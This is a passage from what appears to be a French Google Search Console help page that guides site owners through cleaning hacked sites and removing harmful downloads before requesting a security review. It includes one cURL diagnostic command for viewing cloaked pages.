Explorez certaines pages de votre site et recherchez dans les réponses tout contenu suspect ou tout lien que vous n'avez pas ajouté. Par exemple, recherchez des termes pharmaceutiques ou d'autres termes douteux tels que "viagra" ou "gagner de l'argent".

3. Nettoyer le site

Lorsque vous êtes prêt à nettoyer votre site, vous pouvez soit remplacer les fichiers concernés par la dernière sauvegarde non infectée, soit supprimer de chaque page le contenu et les liens associés à du spam. Assurez-vous de corriger tous les exemples de piratage présentés dans le rapport sur les problèmes de sécurité. Recherchez également les autres pages susceptibles d'avoir été piratées sur votre site via la fonction "site:" sur Google et la recherche dans les fichiers sources de votre site Web.

En outre :

  • Lisez le guide sur le piratage pour découvrir comment résoudre complètement le problème, avec des étapes de nettoyage et des conseils afin d'éviter que votre site ne soit à nouveau piraté.

4. Demander un examen

Une fois que vous confirmez que le problème est résolu sur votre site, demandez un examen dans le rapport sur les problèmes de sécurité. Ce type d'examen peut prendre entre quelques jours et quelques semaines.

Type de piratage : injection d'URL

Un hacker a créé des pages sur votre site, avec un contenu ou des liens souvent associés à du spam. Ces nouvelles pages contiennent parfois du code qui effectue des actions indésirables, telles que rediriger vos internautes vers d'autres sites ou faire participer votre serveur Web à des attaques de type déni de service contre d'autres sites.

1. Déterminer si le problème peut être résolu

Reportez-vous à l'article Mettre en place une équipe d'assistance afin de déterminer les efforts nécessaires pour résoudre le problème vous-même ou de découvrir comment trouver de l'aide si vous pensez ne pas avoir les compétences requises.

2. Confirmer le problème

Évitez d'utiliser un navigateur pour afficher directement les pages infectées de votre site.

Étant donné que les logiciels malveillants se propagent en exploitant les failles des navigateurs, ouvrir une page infectée par un logiciel malveillant dans un navigateur peut endommager votre ordinateur. De plus, les pirates informatiques peuvent masquer le spam via des techniques de dissimulation (cloacking) afin d'empêcher les propriétaires de site de détecter ce type de contenu.

Deux autres options s'offrent à vous pour afficher le contenu sur un ordinateur de manière plus sécurisée :

  • Utilisez l'outil d'inspection d'URL pour afficher votre page tel que Google la voit. Il est très utile, sachant que de nombreux pirates informatiques effectuent des modifications visibles uniquement sur les machines Google. Par exemple, ils peuvent ajouter sur votre site des liens qui renvoient vers le leur et qui sont uniquement visibles lorsque le site référent est Google.
  • Utilisez les commandes cURL ou Wget pour exécuter des requêtes HTTP (telles que l'exploration d'une page) à partir de la ligne de commande. Ces outils disponibles gratuitement sont utiles pour diagnostiquer les URL de redirection et sont en mesure d'inclure des informations concernant des URL de provenance ou des user-agents. Les pirates informatiques attaquent souvent des user-agents ou des URL de provenance très spécifiques pour éviter d'être détectés et pour sélectionner les cibles les plus vulnérables. Le recours à ces outils vous permet de simuler une cible. Essayez d'utiliser différentes URL de provenance (telles que des liens d'importants sites Web ou de moteurs de recherche distincts) si votre requête ne provoque pas le comportement indésirable. Par exemple, pour simuler un utilisateur qui suit un lien provenant des résultats de recherche Google et qui est renvoyé vers www.example.com/page.html sur un ordinateur Windows, vous utiliseriez la commande cURL suivante :

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Interrogez les exemples d'URL répertoriés dans le rapport pour déterminer si ces URL sont actives. Il est probable que vous n'ayez pas créé ces pages vous-même. Vous devrez donc supprimer les pages de votre site ou supprimer le code qui les génère automatiquement. Lisez comment détecter ces pages sur votre site et comment les nettoyer.

Vous pouvez également effectuer une recherche de type "site:" pour identifier les pages que vous n'avez pas créées.

  • Sur les sites de petite taille, vous pouvez rechercher [site: example.com] dans la recherche Google pour afficher une liste des pages que nous avons indexées et déterminer ainsi s'il existe des pages que vous n'avez pas créées.
  • Pour les sites de grande taille, vous pouvez utiliser une requête plus spécifique. Par exemple :
    • [site:example.com pharmacie] : cette requête répertorie toutes les pages contenant le mot "pharmacie" sur example.com. Remplacez ce terme par d'autres termes courants souvent associés à du spam.
    • [site:example.com/wp-admin/] : cette requête répertorie toutes les pages de la section d'administrateur de site de votre site WordPress.

3. Nettoyer le site

Lorsque vous êtes prêt à nettoyer votre site, vous pouvez soit remplacer les répertoires concernés par la dernière sauvegarde non infectée, soit supprimer les pages non souhaitées ainsi que tous les fichiers ou fonctions que le hacker a utilisés pour les créer.

En outre :

  • Lisez le guide sur le piratage pour découvrir comment résoudre complètement le problème, avec des étapes de nettoyage et des conseils afin d'éviter que votre site ne soit à nouveau piraté.

4. Demander un examen

Une fois que vous confirmez que le problème est résolu sur votre site, demandez un examen dans le rapport sur les problèmes de sécurité. Ce type d'examen peut prendre entre quelques jours et quelques semaines.

Téléchargements inhabituels

Votre site propose un téléchargement que la navigation sécurisée Google n'a jamais vu auparavant. Le navigateur Chrome peut vous avertir que ce téléchargement n'est pas courant et qu'il peut être dangereux. Ces avertissements sont levés automatiquement si la navigation sécurisée Google confirme que les fichiers ne présentent aucun danger.

1. Corriger le problème

Vérifiez si vos téléchargements sont conformes aux instructions de téléchargement. Si l'un des téléchargements ne respecte pas ces consignes, supprimez-le. S'ils n'enfreignent pas ces consignes, vous n'avez pas besoin de les supprimer. Il suffit de demander un examen, comme décrit ci-après. Notez que des exemples d'URL ne sont pas toujours fournis pour ce problème.

2. Demander un examen

Lorsque vous avez terminé de supprimer les fichiers (ou lorsque vous avez vérifié que les téléchargements sont conformes aux directives), demandez un examen dans le rapport sur les problèmes de sécurité. Ce type d'examen peut prendre entre quelques jours et quelques semaines.

Téléchargements nuisibles

Votre site propose aux internautes un téléchargement qui, selon la navigation sécurisée Google, est un logiciel malveillant ou un logiciel indésirable. Le navigateur Chrome peut afficher un avertissement lorsqu'un internaute consulte votre site. Vous devez supprimer ces téléchargements de votre site pour supprimer cet avertissement.

1. Évaluer le problème

Si ces téléchargements sont intentionnels, supprimez-les de votre site et passez à l'étape Demander un examen.

Si vous n'aviez pas connaissance de ces téléchargements sur votre site, vous avez peut-être été piraté. Vous devez nettoyer votre site piraté, puis supprimer ces téléchargements.

2. Déterminer si le problème peut être résolu

Reportez-vous à l'article Mettre en place une équipe d'assistance afin de déterminer les efforts nécessaires pour résoudre le problème vous-même ou de découvrir comment trouver de l'aide si vous pensez ne pas avoir les compétences requises.

3. Confirmer le problème

Consultez quelques exemples de pages sur votre site pour confirmer la présence de ces téléchargements.

4. Nettoyer le site

Lisez le guide sur le piratage pour découvrir comment résoudre complètement le problème, avec des étapes de nettoyage et des conseils afin d'éviter que votre site ne soit à nouveau piraté. Lorsque vous êtes prêt à nettoyer le site, vous pouvez soit remplacer les fichiers concernés par la dernière sauvegarde non infectée, soit supprimer le contenu indésirable vous-même. Utilisez un logiciel antivirus pour détecter les binaires et analyser l'ensemble du contenu hébergé sur votre site. Les logiciels antivirus ont la capacité de détecter de nombreux types de logiciels malveillants ou indésirables, mais ne peuvent malheureusement pas tous les reconnaître. En soumettant votre logiciel à un programme antivirus (ou à un service de consolidation antivirus, comme VirusTotal), vous saurez s'il présente des problèmes. La navigation sécurisée Google applique ses propres critères pour déterminer si un programme ou un binaire est un logiciel malveillant ou indésirable.

5. Confirmer les corrections

Assurez-vous que votre site est conforme au Règlement relatif aux logiciels indésirables.

6. Demander un examen

Une fois que vous confirmez que le problème est résolu sur votre site, demandez un examen dans le rapport sur les problèmes de sécurité. Ce type d'examen peut prendre entre quelques jours et quelques semaines.

Liens vers des téléchargements nuisibles

Selon la navigation sécurisée Google, votre site renvoie vers des sites proposant des téléchargements de logiciels malveillants ou indésirables. Le navigateur Chrome peut afficher un avertissement lorsqu'un internaute consulte votre site. Pour supprimer cet avertissement, vous devez supprimer les liens vers les sites nuisibles.

1. Évaluer le problème

Si ces liens sont intentionnels, supprimez-les de votre site et passez à l'étape Demander un examen.

Si vous n'aviez pas connaissance de ces liens, votre site a peut-être été piraté.

2. Déterminer si le problème peut être résolu

Reportez-vous à l'article Mettre en place une équipe d'assistance afin de déterminer les efforts nécessaires pour résoudre le problème vous-même ou de découvrir comment trouver de l'aide si vous pensez ne pas avoir les compétences requises.

3. Confirmer le problème

 

Consultez quelques exemples de pages sur votre site pour confirmer la présence de ces téléchargements. Dans certains cas, les hackers peuvent masquer ces liens s'ils pensent que vous êtes le propriétaire du site. Essayez donc de consulter les exemples d'URL à l'aide de l'outil d'inspection d'URL ou de vous connecter avec un autre compte ou un autre ordinateur.

4. Nettoyer le site

Lisez le guide sur le piratage pour découvrir comment résoudre complètement le problème, avec des étapes de nettoyage et des conseils afin d'éviter que votre site ne soit à nouveau piraté. Lorsque vous êtes prêt à nettoyer le site, vous pouvez soit remplacer les fichiers concernés par la dernière sauvegarde non infectée, soit supprimer le contenu indésirable vous-même.

5. Confirmer les corrections

Assurez-vous que votre site est conforme au Règlement relatif aux logiciels indésirables.

6. Demander un examen

Une fois que vous confirmez que le problème est résolu sur votre site, demandez un examen dans le rapport sur les problèmes de sécurité. Ce type d'examen peut prendre entre quelques jours et quelques semaines.

Facturation mobile manquant de clarté

Si Google a détecté que votre site ne fournit pas assez d'informations aux utilisateurs concernant les frais sur mobile, Chrome peut afficher un avertissement avant que l'internaute ne charge une page entraînant de tels frais.

1. Confirmer le problème

Consultez les exemples d'URL répertoriés dans le rapport pour identifier les pages dont la facturation mobile n'est pas claire. Consultez les instructions de facturation mobile ici.

2. Corriger le problème

Corrigez vos pages afin qu'elles soient conformes aux bonnes pratiques en matière de facturation mobile.

3. Demander un examen

Une fois que vous confirmez que le problème est résolu sur votre site, demandez un examen dans le rapport sur les problèmes de sécurité. Ce type d'examen peut prendre entre quelques jours et quelques semaines.

Quelle est la différence entre le rapport sur les actions manuelles et le rapport sur les problèmes de sécurité ?

Le rapport sur les actions manuelles répertorie les problèmes détectés sur une page ou sur un site. Il s'agit principalement de tentatives de manipulation de notre index de recherche, mais elles ne représentent pas nécessairement un danger pour les internautes. La plupart de ces problèmes entraînent une rétrogradation des pages ou des sites dans les résultats de recherche, ou leur suppression de ces derniers, sans aucune indication visuelle pour l'internaute.

Le rapport sur les problèmes de sécurité répertorie les signes de piratage de votre site, ou les comportements pouvant nuire à vos visiteurs ou à leur ordinateur. Il peut s'agir d'attaques par hameçonnage, ou de l'installation d'un logiciel malveillant ou indésirable sur l'ordinateur de l'internaute. Ces pages peuvent être accompagnées d'un message d'avertissement dans les résultats de recherche, ou le navigateur peut afficher une page d'avertissement interstitielle lorsqu'un internaute tente d'y accéder.

Ces informations vous-ont elles été utiles ?
Comment pouvons-nous l'améliorer ?